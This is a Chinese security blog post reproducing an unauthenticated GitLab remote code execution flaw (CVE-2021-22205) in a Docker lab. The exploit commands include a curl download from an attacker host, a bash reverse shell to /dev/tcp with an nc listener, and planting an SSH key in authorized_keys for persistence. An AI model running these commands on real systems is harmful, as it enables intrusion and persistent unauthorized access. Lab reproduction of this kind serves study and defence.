<!DOCTYPE html>
<html lang="zh-Hans">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="Al0nez" />



<meta name="description" content="本来早该复现完的，中间因为太多事情耽误了。">
<meta property="og:type" content="article">
<meta property="og:title" content="GitLab未授权RCE">
<meta property="og:url" content="https://al0nez.github.io/2021/12/17/GitLab%E6%9C%AA%E6%8E%88%E6%9D%83RCE/index.html">
<meta property="og:site_name" content="Al0nez&#39;s Bolg">
<meta property="og:description" content="本来早该复现完的，中间因为太多事情耽误了。">
<meta property="og:locale">
<meta property="og:image" content="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211216104712547.png">
<meta property="og:image" content="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211216105224401.png">
<meta property="og:image" content="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211216174619254.png">
<meta property="og:image" content="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211216174715381.png">
<meta property="og:image" content="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211216182818722.png">
<meta property="og:image" content="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211216183027591.png">
<meta property="og:image" content="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211217140517410.png">
<meta property="og:image" content="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211217142208397.png">
<meta property="article:published_time" content="2021-12-17T06:45:42.000Z">
<meta property="article:modified_time" content="2021-12-17T06:47:41.511Z">
<meta property="article:author" content="Al0nez">
<meta property="article:tag" content="GitLab">
<meta property="article:tag" content="RCE">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211216104712547.png">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="Al0nez&#39;s Bolg" type="application/atom+xml">



    <link rel="shortcut icon" href="/img/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>GitLab未授权RCE | Al0nez&#39;s Bolg</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: true
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






<meta name="generator" content="Hexo 5.4.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/avatar.jpg" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">Al0nez</a></h1>
        </hgroup>

        
        <p class="header-subtitle">我与春风皆过客,你携秋水揽星河</p>
        

        
            <form id="search-form">
            <input type="text" id="local-search-input" name="q" placeholder="search..." class="search form-control" autocomplete="off" autocorrect="off" searchonload="" />
            <i class="fa fa-times" onclick="resetSearch()"></i>
            </form>
            <div id="local-search-result"></div>
            <p class='no-result'>No results found <i class='fa fa-spinner fa-pulse'></i></p>
        


        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">文章</a></li>
                        
                            <li><a href="/tags/">标签</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa 博客园" href="/L0ne1y.github.io" title="博客园"></a>
                            
                                <a class="fa QQ" href="#" title="QQ"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">专注于前端</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">Al0nez</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/avatar.jpg" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">Al0nez</a></h1>
            </hgroup>
            
            <p class="header-subtitle">我与春风皆过客,你携秋水揽星河</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">文章</a></li>
                
                    <li><a href="/tags/">标签</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa 博客园" target="_blank" href="/L0ne1y.github.io" title="博客园"></a>
                            
                                <a class="fa QQ" target="_blank" href="#" title="QQ"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-GitLab未授权RCE" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2021/12/17/GitLab%E6%9C%AA%E6%8E%88%E6%9D%83RCE/" class="article-date">
      <time datetime="2021-12-17T06:45:42.000Z" itemprop="datePublished">2021-12-17</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      GitLab未授权RCE
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/GitLab/" rel="tag">GitLab</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/RCE/" rel="tag">RCE</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>本来早该复现完的，中间因为太多事情耽误了。</p>
<span id="more"></span>

<h3 id="0x01-漏洞介绍"><a href="#0x01-漏洞介绍" class="headerlink" title="0x01.漏洞介绍"></a>0x01.漏洞介绍</h3><p>GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git（版本控制系统）项目仓库应用程序。 由于 GitLab 没有正确验证传递给文件解析器的图像文件，攻击者可利用该漏洞在服务端进行远程命令执行。</p>
<h3 id="0x02-影响版本"><a href="#0x02-影响版本" class="headerlink" title="0x02.影响版本"></a>0x02.影响版本</h3><p><code>11.9 &lt;=  GitLab（CE/EE）&lt; 13.8.8</code><br><code>13.9 &lt;=  GitLab（CE/EE）&lt; 13.9.6</code><br><code>13.10 &lt;= GitLab（CE/EE）&lt; 13.10.3</code></p>
<h3 id="0x03-环境搭建"><a href="#0x03-环境搭建" class="headerlink" title="0x03.环境搭建"></a>0x03.环境搭建</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/vulhub/vulhub.git</span><br><span class="line">cd vulhub/gitlab/CVE-2021-22205/</span><br><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>

<p>访问<code>http://127.0.0.1:8080</code>即可。</p>
<h3 id="0x04-漏洞复现"><a href="#0x04-漏洞复现" class="headerlink" title="0x04.漏洞复现"></a>0x04.漏洞复现</h3><h4 id="利用脚本"><a href="#利用脚本" class="headerlink" title="利用脚本"></a>利用脚本</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/Al1ex/CVE-2021-22205</span><br></pre></td></tr></table></figure>

<h4 id="探测漏洞是否存在"><a href="#探测漏洞是否存在" class="headerlink" title="探测漏洞是否存在"></a>探测漏洞是否存在</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python CVE-2021-22205.py -v true -t http://192.168.47.156:8080/</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211216104712547.png" alt="image-20211216104712547"></p>
<h4 id="下载文件"><a href="#下载文件" class="headerlink" title="下载文件"></a>下载文件</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python CVE-2021-22205.py -a true -t http://192.168.47.156:8080/ -c &quot;curl http://10.1.3.91:1234/1.txt&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211216105224401.png" alt="image-20211216105224401"></p>
<h4 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">#写入shell</span><br><span class="line">python CVE-2021-22205.py -a true -t http://192.168.47.156:8080/ -c &quot;echo &#x27;bash -i &gt;&amp; /dev/tcp/10.1.3.91/6666 0&gt;</span><br><span class="line">&amp;1&#x27; &gt; /tmp/1.sh&quot;</span><br><span class="line">#赋予shell脚本执行权限</span><br><span class="line">py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c &quot;chmod +x /tmp/1.sh&quot;</span><br><span class="line">#服务器监听6666端口</span><br><span class="line">nc64.exe -lvnp  6666</span><br><span class="line">#获取git权限</span><br><span class="line">py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c &quot;/bin/bash /tmp/1.sh&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211216174619254.png" alt="image-20211216174619254"></p>
<p>执行完命令后，成功上线。</p>
<p><img src="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211216174715381.png" alt="image-20211216174715381"></p>
<p>可以看到我们创建的1.sh也在。</p>
<h4 id="ssh公钥登录"><a href="#ssh公钥登录" class="headerlink" title="ssh公钥登录"></a>ssh公钥登录</h4><p>通过<code>cat /etc/passwd</code>可以发现git用户可以远程ssh登录。</p>
<p><img src="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211216182818722.png" alt="image-20211216182818722"></p>
<p>我们将公钥写到目标机器上进行登录。</p>
<p>本地生成一下ssh公钥，输入<code>ssh-keygen</code>然后一路回车就OK了。</p>
<p><img src="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211216183027591.png" alt="image-20211216183027591"></p>
<p>之后利用我们之前反弹获取到的shell，将公钥下载到目标机器上。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget http://10.1.3.91:1234/gitlab_git.pub</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211217140517410.png" alt="image-20211217140517410"></p>
<p>默认情况下git用户的authorized_keys内容为空，如果存在内容的话，先备份一下，再写入。这里要注意的是<code>authorized_keys</code>是在用户下的.ssh目录下。</p>
<p>写入成功后进行ssh登录即可。</p>
<p><img src="https://gitee.com/Gzero_GG/images/raw/master/img/image-20211217142208397.png" alt="image-20211217142208397"></p>
<p>后续本来想要手工再利用的，没有账号密码！！！。</p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2021/12/17/GitLab%E6%9C%AA%E6%8E%88%E6%9D%83RCE/">GitLab未授权RCE</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">Al0nez</a></p>
        <p><span>发布时间:</span>2021-12-17, 14:45:42</p>
        <p><span>最后更新:</span>2021-12-17, 14:47:41</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2021/12/17/GitLab%E6%9C%AA%E6%8E%88%E6%9D%83RCE/" title="GitLab未授权RCE">https://al0nez.github.io/2021/12/17/GitLab%E6%9C%AA%E6%8E%88%E6%9D%83RCE/</a>
            <span class="copy-path" data-clipboard-text="原文: https://al0nez.github.io/2021/12/17/GitLab%E6%9C%AA%E6%8E%88%E6%9D%83RCE/　　作者: Al0nez" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2021/12/20/Fastjson1-2-24%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/">
                    Fastjson 1-2-24 远程命令执行漏洞
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2021/12/08/Grafana%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/">
                    Grafana任意文件读取
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.</span> <span class="toc-text">0x01.漏洞介绍</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x02-%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC"><span class="toc-number">2.</span> <span class="toc-text">0x02.影响版本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x03-%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-number">3.</span> <span class="toc-text">0x03.环境搭建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x04-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">4.</span> <span class="toc-text">0x04.漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E8%84%9A%E6%9C%AC"><span class="toc-number">4.1.</span> <span class="toc-text">利用脚本</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B%E6%BC%8F%E6%B4%9E%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8"><span class="toc-number">4.2.</span> <span class="toc-text">探测漏洞是否存在</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%8B%E8%BD%BD%E6%96%87%E4%BB%B6"><span class="toc-number">4.3.</span> <span class="toc-text">下载文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">4.4.</span> <span class="toc-text">反弹shell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ssh%E5%85%AC%E9%92%A5%E7%99%BB%E5%BD%95"><span class="toc-number">4.5.</span> <span class="toc-text">ssh公钥登录</span></a></li></ol></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-5 i,
        .toc-level-5 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>





    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2021/12/20/Fastjson1-2-24%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" title="上一篇: Fastjson 1-2-24 远程命令执行漏洞">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2021/12/08/Grafana%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/" title="下一篇: Grafana任意文件读取">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2021/12/20/Fastjson1-2-47%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/">Fastjson 1.2.47 远程命令执行漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/12/20/Fastjson1-2-24%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/">Fastjson 1-2-24 远程命令执行漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/12/17/GitLab%E6%9C%AA%E6%8E%88%E6%9D%83RCE/">GitLab未授权RCE</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/12/08/Grafana%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/">Grafana任意文件读取</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/12/03/Clash%E9%85%8D%E7%BD%AETUN%E6%A8%A1%E5%BC%8F/">Clash配置TUN模式</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2021 Al0nez
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 6;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        $("a[target=_blank]").removeAttr("target");
    
</script>

    <script>
        var originTitle = document.title;
        var titleTime;
        document.addEventListener("visibilitychange", function() {
            if (document.hidden) {
                document.title = "(つェ⊂) 我藏好了哦~ " + originTitle;
                clearTimeout(titleTime);
            }
            else {
                document.title = "(*´∇｀*) 被你发现啦~ " + originTitle;
                titleTime = setTimeout(function() {
                    document.title = originTitle;
                }, 2000);
            }
        })
    </script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>